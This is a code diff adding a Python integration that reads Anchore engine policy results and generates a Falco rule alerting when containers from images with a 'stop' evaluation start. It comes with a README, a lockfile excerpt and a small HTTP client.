+        "args": {
+            "hashes": [
+                "sha256:a785b8d837625e9b61c39108532d95b85274acd679693b71ebb5156848fcf814"
+            ],
+            "version": "==0.1.0"
+        },
+        "clint": {
+            "hashes": [
+                "sha256:05224c32b1075563d0b16d0015faaf9da43aa214e4a2140e51f08789e7a4c5aa"
+            ],
+            "version": "==0.5.1"
+        },
+        "coverage": {
+            "hashes": [
+                "sha256:0c5fe441b9cfdab64719f24e9684502a59432df7570521563d7b1aff27ac755f",
+                "sha256:2b412abc4c7d6e019ce7c27cbc229783035eef6d5401695dccba80f481be4eb3",
+                "sha256:3684fabf6b87a369017756b551cef29e505cb155ddb892a7a29277b978da88b9",
+                "sha256:39e088da9b284f1bd17c750ac672103779f7954ce6125fd4382134ac8d152d74",
+                "sha256:3c205bc11cc4fcc57b761c2da73b9b72a59f8d5ca89979afb0c1c6f9e53c7390",
+                "sha256:42692db854d13c6c5e9541b6ffe0fe921fe16c9c446358d642ccae1462582d3b",
+                "sha256:465ce53a8c0f3a7950dfb836438442f833cf6663d407f37d8c52fe7b6e56d7e8",
+                "sha256:48020e343fc40f72a442c8a1334284620f81295256a6b6ca6d8aa1350c763bbe",
+                "sha256:4ec30ade438d1711562f3786bea33a9da6107414aed60a5daa974d50a8c2c351",
+                "sha256:5296fc86ab612ec12394565c500b412a43b328b3907c0d14358950d06fd83baf",
+                "sha256:5f61bed2f7d9b6a9ab935150a6b23d7f84b8055524e7be7715b6513f3328138e",
+                "sha256:6899797ac384b239ce1926f3cb86ffc19996f6fa3a1efbb23cb49e0c12d8c18c",
+                "sha256:68a43a9f9f83693ce0414d17e019daee7ab3f7113a70c79a3dd4c2f704e4d741",
+                "sha256:6b8033d47fe22506856fe450470ccb1d8ba1ffb8463494a15cfc96392a288c09",
+                "sha256:7ad7536066b28863e5835e8cfeaa794b7fe352d99a8cded9f43d1161be8e9fbd",
+                "sha256:7bacb89ccf4bedb30b277e96e4cc68cd1369ca6841bde7b005191b54d3dd1034",
+                "sha256:839dc7c36501254e14331bcb98b27002aa415e4af7ea039d9009409b9d2d5420",
+                "sha256:8e679d1bde5e2de4a909efb071f14b472a678b788904440779d2c449c0355b27",
+                "sha256:8f9a95b66969cdea53ec992ecea5406c5bd99c9221f539bca1e8406b200ae98c",
+                "sha256:932c03d2d565f75961ba1d3cec41ddde00e162c5b46d03f7423edcb807734eab",
+                "sha256:93f965415cc51604f571e491f280cff0f5be35895b4eb5e55b47ae90c02a497b",
+                "sha256:988529edadc49039d205e0aa6ce049c5ccda4acb2d6c3c5c550c17e8c02c05ba",
+                "sha256:998d7e73548fe395eeb294495a04d38942edb66d1fa61eb70418871bc621227e",
+                "sha256:9de60893fb447d1e797f6bf08fdf0dbcda0c1e34c1b06c92bd3a363c0ea8c609",
+                "sha256:9e80d45d0c7fcee54e22771db7f1b0b126fb4a6c0a2e5afa72f66827207ff2f2",
+                "sha256:a545a3dfe5082dc8e8c3eb7f8a2cf4f2870902ff1860bd99b6198cfd1f9d1f49",
+                "sha256:a5d8f29e5ec661143621a8f4de51adfb300d7a476224156a39a392254f70687b",
+                "sha256:a9abc8c480e103dc05d9b332c6cc9fb1586330356fc14f1aa9c0ca5745097d19",
+                "sha256:aca06bfba4759bbdb09bf52ebb15ae20268ee1f6747417837926fae990ebc41d",
+                "sha256:bb23b7a6fd666e551a3094ab896a57809e010059540ad20acbeec03a154224ce",
+                "sha256:bfd1d0ae7e292105f29d7deaa9d8f2916ed8553ab9d5f39ec65bcf5deadff3f9",
+                "sha256:c22ab9f96cbaff05c6a84e20ec856383d27eae09e511d3e6ac4479489195861d",
+                "sha256:c62ca0a38958f541a73cf86acdab020c2091631c137bd359c4f5bddde7b75fd4",
+                "sha256:c709d8bda72cf4cd348ccec2a4881f2c5848fd72903c185f363d361b2737f773",
+                "sha256:c968a6aa7e0b56ecbd28531ddf439c2ec103610d3e2bf3b75b813304f8cb7723",
+                "sha256:ca58eba39c68010d7e87a823f22a081b5290e3e3c64714aac3c91481d8b34d22",
+                "sha256:df785d8cb80539d0b55fd47183264b7002077859028dfe3070cf6359bf8b2d9c",
+                "sha256:f406628ca51e0ae90ae76ea8398677a921b36f0bd71aab2099dfed08abd0322f",
+                "sha256:f46087bbd95ebae244a0eda01a618aff11ec7a069b15a3ef8f6b520db523dcf1",
+                "sha256:f8019c5279eb32360ca03e9fac40a12667715546eed5c5eb59eb381f2f501260",
+                "sha256:fc5f4d209733750afd2714e9109816a29500718b32dd9a5db01c0cb3a019b96a"
+            ],
+            "version": "==4.5.3"
+        },
+        "doublex": {
+            "hashes": [
+                "sha256:4e9f17f346276db7faa461dfa105f17de7f837e5ceccca34f4c70d4ff9d2f20c"
+            ],
+            "index": "pypi",
+            "version": "==1.9.2"
+        },
+        "doublex-expects": {
+            "hashes": [
+                "sha256:5421bd92319c77ccc5a81d595d06e9c9f7f670de342b33e8007a81e70f9fade8"
+            ],
+            "index": "pypi",
+            "version": "==0.7.0rc2"
+        },
+        "expects": {
+            "hashes": [
+                "sha256:419902ccafe81b7e9559eeb6b7a07ef9d5c5604eddb93000f0642b3b2d594f4c"
+            ],
+            "index": "pypi",
+            "version": "==0.9.0"
+        },
+        "mamba": {
+            "hashes": [
+                "sha256:25328151ea94d97a0b461d7256dc7350c99b5f8d2de22d355978378edfeac545"
+            ],
+            "index": "pypi",
+            "version": "==0.10"
+        },
+        "pyhamcrest": {
+            "hashes": [
+                "sha256:6b672c02fdf7470df9674ab82263841ce8333fb143f32f021f6cb26f0e512420",
+                "sha256:7a4bdade0ed98c699d728191a058a60a44d2f9c213c51e2dd1e6fb42f2c6128a",
+                "sha256:8ffaa0a53da57e89de14ced7185ac746227a8894dbd5a3c718bf05ddbd1d56cd",
+                "sha256:bac0bea7358666ce52e3c6c85139632ed89f115e9af52d44b3c36e0bf8cf16a9",
+                "sha256:f30e9a310bcc1808de817a92e95169ffd16b60cbc5a016a49c8d0e8ababfae79"
+            ],
+            "version": "==1.9.0"
+        },
+        "six": {
+            "hashes": [
+                "sha256:3350809f0555b11f552448330d0b52d5f24c91a322ea4a15ef22629740f3761c",
+                "sha256:d16a0141ec1a18405cd4ce8b4613101da75da0e9a7aec5bdd4fa804d0e0eba73"
+            ],
+            "version": "==1.12.0"
+        }
+    }
+}

integrations/anchore-falco/README.md

@@ -0,0 +1,89 @@
+# Create Falco rule from Anchore policy result
+
+This integration creates a rule for Falco based on Anchore policy result.
+So that when we will try to run an image which has a ```stop``` final action result
+in Anchore, Falco will alert us.
+
+## Getting started
+
+### Prerequisites
+
+For running this integration you will need:
+
+* Python 3.6
+* pipenv
+* An [anchore-engine](https://github.com/anchore/anchore-engine) running
+
+### Configuration
+
+This integration uses the [same environment variables that anchore-cli](https://github.com/anchore/anchore-cli#configuring-the-anchore-cli):
+
+* ANCHORE_CLI_USER: The user used to connect to anchore-engine. By default is ```admin```
+* ANCHORE_CLI_PASS: The password used to connect to anchore-engine.
+* ANCHORE_CLI_URL: The url where anchore-engine listens. Make sure does not end with a slash. By default is ```http://localhost:8228/v1```
+* ANCHORE_CLI_SSL_VERIFY: Flag for enabling if HTTP client verifies SSL. By default is ```true```
+
+### Running
+
+This is a Python program which generates a Falco rule based on anchore-engine
+information:
+
+```
+pipenv run python main.py
+```
+
+And this will output something like:
+
+
+```yaml
+- macro: anchore_stop_policy_evaluation_containers
+  condition: container.image.id in ("8626492fecd368469e92258dfcafe055f636cb9cbc321a5865a98a0a6c99b8dd", "e86d9bb526efa0b0401189d8df6e3856d0320a3d20045c87b4e49c8a8bdb22c1")
+
+- rule: Run Anchore Containers with Stop Policy Evaluation
+  desc: Detect containers which does not receive a positive Policy Evaluation from Anchore Engine.
+
+  condition: evt.type=execve and proc.vpid=1 and container and anchore_stop_policy_evaluation_containers
+  output: A stop policy evaluation container from anchore has started (%container.info image=%container.image)
+  priority: INFO
+  tags: [container]
+```
+
+You can save that output to ```/etc/falco/rules.d/anchore-integration-rules.yaml```
+and Falco will start checking this rule.
+
+As long as information in anchore-engine can change, it's a good idea to run this
+integration **periodically** and keep the rule synchronized with anchore-engine
+policy evaluation result.
+
+## Tests
+
+As long as there are contract tests with anchore-engine, it needs a working
+anchore-engine and its environment variables.
+
+```
+pipenv install -d
+pipenv run mamba --format=documentation
+```
+
+## Docker support
+
+### Build the image
+
+```
+docker build -t sysdig/anchore-falco .
+```
+
+### Running the image
+
+An image exists on DockerHub, its name is ```sysdig/anchore-falco```.
+
+So you can run directly with Docker:
+
+```
+docker run --rm -e ANCHORE_CLI_USER=<user-for-custom-anchore-engine> \
+                -e ANCHORE_CLI_PASS=<password-for-user-for-custom-anchore-engine> \
+                -e ANCHORE_CLI_URL=http://<custom-anchore-engine-host>:8228/v1 \
+                sysdig/anchore-falco
+```
+
+And this will output the Falco rule based on *custom-anchore-engine-host*.

integrations/anchore-falco/actions.py

@@ -0,0 +1,25 @@
+import string
+
+FALCO_RULE_TEMPLATE = string.Template('''
+- macro: anchore_stop_policy_evaluation_containers
+  condition: container.image.id in ($images)
+
+- rule: Run Anchore Containers with Stop Policy Evaluation
+  desc: Detect containers which does not receive a positive Policy Evaluation from Anchore Engine.
+
+  condition: evt.type=execve and proc.vpid=1 and container and anchore_stop_policy_evaluation_containers
+  output: A stop policy evaluation container from anchore has started (%container.info image=%container.image)
+  priority: INFO
+  tags: [container]
+''')
+
+
+class CreateFalcoRuleFromAnchoreStopPolicyResults:
+    def __init__(self, anchore_client):
+        self._anchore_client = anchore_client
+
+    def run(self):
+        images = self._anchore_client.get_images_with_policy_result('stop')
+
+        images = ['"{}"'.format(image) for image in images]
+        return FALCO_RULE_TEMPLATE.substitute(images=', '.join(images))

integrations/anchore-falco/infrastructure.py

@@ -0,0 +1,39 @@
+import requests
+
+
+class AnchoreClient:
+    def __init__(self, user, password, url, ssl_verify):
+        self._user = user
+        self._password = password
+        self._url = url
+        self._ssl_verify = ssl_verify
+
+    def get_images_with_policy_result(self, policy_result):
+        results = []
+        for image in self._get_all_images():
+            final_action = self._evaluate_image(image)
+
+            if final_action == 'stop':
+                results.append(image['image_id'])
+
+        return results
+
+    def _get_all_images(self):
+        response = self._do_get_request(self._url + '/images')
+        return [
+            {
+                'image_id': image['image_detail'][0]['imageId'],
+                'image_digest': image['image_detail'][0]['imageDigest'],
+                'full_tag': image['image_detail'][0]['fulltag']
+            } for image in response.json()]
+
+    def _do_get_request(self, url):
+        return requests.get(url,
+                            auth=(self._user, self._password),
+                            verify=self._ssl_verify,
+                            headers={'Content-Type': 'application/json'})
+
+    def _evaluate_image(self, image):
+        response = self._do_get_request(self._url + '/images/{}/check?tag={}'.format(image['image_digest'], image['full_tag']))
+        if response.status_code == 200:
+            return response.json()[0][image['image_digest']][image['full_tag']][0]['detail']['result']['final_action']